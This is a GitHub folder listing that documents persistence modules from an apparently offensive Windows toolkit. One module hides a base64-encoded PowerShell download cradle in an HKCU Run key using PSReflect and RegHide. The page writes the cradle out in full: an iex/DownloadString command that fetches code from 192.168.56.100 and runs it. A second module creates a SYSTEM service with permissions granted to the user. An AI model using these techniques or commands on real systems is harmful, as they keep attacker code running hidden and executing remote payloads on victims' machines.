Skip to content

Files

Latest commit

 

History

History

persistence

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 

Modules

PowerShell HKCU via PSReflect

Accepts a basic base64'd (to avoid escaping pain) download cradle. Writes it to HKCU\Software\Microsoft\Windows\Run\`0pwned using a modified version of PSReflect and RegHide.

HKCU (PSH)

Basic Example:

iex ([System.Net.WebClient]::New().DownloadString('http://192.168.56.100/a')) aQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0AOgA6AE4AZQB3ACgAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAwADAALwBhACcAKQApAA==

Windows Service Persistence

Creates a Windows Service (running as SYSTEM) with the specified options and uses sc sdset to assign start/stop permissions to the user SID. Requires you to manually upload a payload.

Service